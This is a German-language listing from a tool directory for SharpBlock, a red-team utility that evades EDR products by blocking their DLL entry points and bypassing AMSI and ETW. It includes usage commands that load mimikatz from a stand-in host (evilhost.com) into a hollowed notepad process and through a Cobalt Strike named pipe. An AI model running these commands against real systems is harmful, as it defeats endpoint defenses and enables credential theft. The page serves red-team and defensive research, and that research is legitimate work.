Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
SharpBlock — Eine Methode zur Umgehung der aktiven Projektions-DLLs von EDRs durch Verhinderung der Ausführung des Einstiegspunkts | Kitploit
Tools/GitHubGitHub/ccob/sharpblock
Red Teaming
GitHubccob/sharpblock

SharpBlock

Eine Methode zur Umgehung der aktiven Projektions-DLLs von EDRs durch Verhinderung der Ausführung des Einstiegspunkts

Repository anzeigen
1.2k165vor 5 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

SharpBlock

Eine Methode zur Umgehung der aktiven Projection-DLLs von EDR, indem die Ausführung des Einstiegspunkts verhindert wird.

Funktionen

  • Blockiert die Ausführung von EDR-DLL-Einstiegspunkten, wodurch verhindert wird, dass EDR-Hooks platziert werden.
  • Patchloser AMSI-Bypass, der von Scannern, die zur Laufzeit nach Amsi.dll-Codepatches suchen, nicht erkannt werden kann.
  • Hostprozess, der durch eine Implant-PE ersetzt wird, die von der Festplatte, über HTTP oder eine Named Pipe (Cobalt Strike) geladen werden kann.
  • Der implantierte Prozess wird ausgeblendet, um Scanner zu umgehen, die nach ausgehöhlten Prozessen suchen.
  • Befehlszeilenargumente werden gefälscht und nach der Prozesserstellung mit einer versteckten EDR-Erkennungsmethode implantiert.
  • Patchloser ETW-Bypass.
  • Blockiert den Aufruf von NtProtectVirtualMemory, wenn der Aufrufer sich im Adressraum einer blockierten DLL befindet.
root@kitploit:~
SharpBlock by @_EthicalChaos_
  DLL Blocking app for child processes x64

  -e, --exe=VALUE            Program to execute (default cmd.exe)
  -a, --args=VALUE           Arguments for program (default null)
  -n, --name=VALUE           Name of DLL to block
  -c, --copyright=VALUE      Copyright string to block
  -p, --product=VALUE        Product string to block
  -d, --description=VALUE    Description string to block
  -s, --spawn=VALUE          Host process to spawn for swapping with the target exe
  -ppid=VALUE                Parent process ID for spawned child (PPID Spoofing)
  -w, --show                 Show the lauched process window instead of the
                               default hide
      --disable-bypass-amsi  Disable AMSI bypassAmsi
      --disable-bypass-cmdline
                             Disable command line bypass
      --disable-bypass-etw   Disable ETW bypass
      --disable-header-patch Disable process hollow detection bypass
  -h, --help                 Display this help

Beispiele

Starten von mimikatz über HTTP mit Notepad als Hostprozess, wobei die DLL von SylantStrike blockiert wird

root@kitploit:~
SharpBlock -e http://evilhost.com/mimikatz.bin -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee

Starten von mimikatz mit Cobalt Strike Beacon über Named Pipe mit Notepad als Hostprozess, wobei die DLL von SylantStrike blockiert wird

root@kitploit:~
execute-assembly SharpBlock.exe -e \\.\pipe\mimi -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee
upload_file /home/haxor/mimikatz.exe \\.\pipe\mimi

Hinweis: Für den upload_file-Beacon-Befehl laden Sie upload.cna in den Skript-Manager von Cobalt Strike.

Begleitende Blogbeiträge:

  • https://ethicalchaos.dev/2020/05/27/lets-create-an-edr-and-bypass-it-part-1/
  • https://ethicalchaos.dev/2020/06/14/lets-create-an-edr-and-bypass-it-part-2/
  • https://www.pentestpartners.com/security-blog/patchless-amsi-bypass-using-sharpblock/
Tool herunterladen